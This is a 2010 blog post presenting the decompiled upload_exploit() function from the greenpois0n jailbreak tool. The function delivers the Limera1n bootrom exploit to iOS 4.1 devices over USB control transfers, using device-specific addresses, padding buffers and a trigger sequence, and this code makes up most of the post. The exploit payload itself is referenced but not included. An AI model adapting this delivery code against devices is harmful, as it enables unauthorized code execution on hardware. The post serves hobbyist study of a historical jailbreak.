Limera1n and Greenpois0n: meet the code behind the exploit (iPhone jailbreak exploit code)
October 15, 2010 by Brian
Both the Limera1n and Greenpois0n jailbreaks for iDevices running iOS 4.1 use the same exploit, which was apparently first discovered by geohot some 6 months ago.
If you're a programmer or a hacker, you may be interested in the code behind this exploit.
Luckily, an anonymous web user posted what appears to be the decompiled exploit function from greenpois0n (Linux version), so anyone interested can have a look at it. Obviously it's not of much use to the regular user, but it should be interesting reading for beginning iPhone hackers.
We've also posted the greenpois0n exploit code below for your convenience.
// Decompiler output as posted. External symbols (device, client, exploit,
// libpois0n_debug, aCannotFindS and the irecv_* functions) belong to
// libpois0n / libirecovery and are not part of this listing.
signed int __cdecl upload_exploit()
{
  int v0; // eax@1
  signed int v1; // edx@2
  int v2; // ebx@2
  int v3; // eax@4
  char *v4; // eax@5
  unsigned int v5; // ebx@8
  int v6; // ecx@14
  signed int result; // eax@15
  signed int v8; // ST38_4@18
  int v9; // eax@28
  signed int v10; // [sp+38h] [bp-1030h]@4
  signed int v11; // [sp+3Ch] [bp-102Ch]@2
  char v12; // [sp+4Ch] [bp-101Ch]@3
  char v13; // [sp+84Ch] [bp-81Ch]@5
  int v14; // [sp+104Ch] [bp-1Ch]@1

  v14 = *MK_FP(__GS__, 20); // stack canary
  v0 = *(_DWORD *)(device + 16);
  if ( v0 == 8930 )
  {
    v11 = 174080;
    v1 = -2080198655;
    v2 = -2080129124;
  }
  else
  {
    v1 = -2080231423;
    v11 = 141312;
    v2 = (((v0 == 8920) - 1) & 0xFFFFFFF4) - 2080161884;
  }
  memset(&v12, 0, 0x800u);
  memcpy(&v12, exploit, 0x230u);
  if ( libpois0n_debug )
  {
    v8 = v1;
    ((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, "Resetting device counters\n");
    v1 = v8;
  }
  v10 = v1;
  v3 = irecv_reset_counters(client);
  if ( v3 )
  {
    irecv_strerror(v3);
    __fprintf_chk(stderr, 1, &aCannotFindS[12]);
    result = -1;
  }
  else
  {
    memset(&v13, -858993460, 0x800u);
    v4 = &v13;
    do
    {
      *(_DWORD *)v4 = 1029;
      *((_DWORD *)v4 + 1) = 257;
      *((_DWORD *)v4 + 2) = v10;
      *((_DWORD *)v4 + 3) = v2;
      v4 += 64;
    }
    while ( (int *)v4 != &v14 );
    if ( libpois0n_debug )
      ((void (__cdecl *)(int, signed int, _DWORD))__fprintf_chk)(stderr, 1, "Sending chunk headers\n");
    v5 = 0;
    irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
    memset(&v13, -858993460, 0x800u);
    do
    {
      v5 += 2048;
      irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
    }
    while ( v5 < v11 );
    if ( libpois0n_debug )
      ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending exploit payload\n");
    irecv_control_transfer(client, 33, 1, 0, 0, &v12, 2048);
    if ( libpois0n_debug )
      ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Sending fake data\n");
    memset(&v13, -1145324613, 0x800u);
    irecv_control_transfer(client, 161, 1, 0, 0, &v13, 2048);
    irecv_control_transfer(client, 33, 1, 0, 0, &v13, 2048);
    if ( libpois0n_debug )
      ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Executing exploit\n");
    irecv_control_transfer(client, 33, 2, 0, 0, &v13, 0);
    irecv_reset(client);
    irecv_finish_transfer(client);
    if ( libpois0n_debug )
    {
      ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Exploit sent\n");
      if ( libpois0n_debug )
        ((void (__cdecl *)(_DWORD, _DWORD, _DWORD))__fprintf_chk)(stderr, 1, "Reconnecting to device\n");
    }
    client = (void *)irecv_reconnect(client, 2u);
    if ( client )
    {
      result = 0;
    }
    else
    {
      if ( libpois0n_debug )
      {
        v9 = irecv_strerror(0);
        __fprintf_chk(stderr, 1, &aCannotFindS[12], v9);
      }
      __fprintf_chk(stderr, 1, "Unable to reconnect\n");
      result = -1;
    }
  }
  if ( *MK_FP(__GS__, 20) != v14 )
    __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14); // stack canary check
  return result;
}
Tags: code, exploit, geohot, Greenpois0n, hack, iOS 4.1, iPhone, iTouch, jailbreak, Limera1n, Linux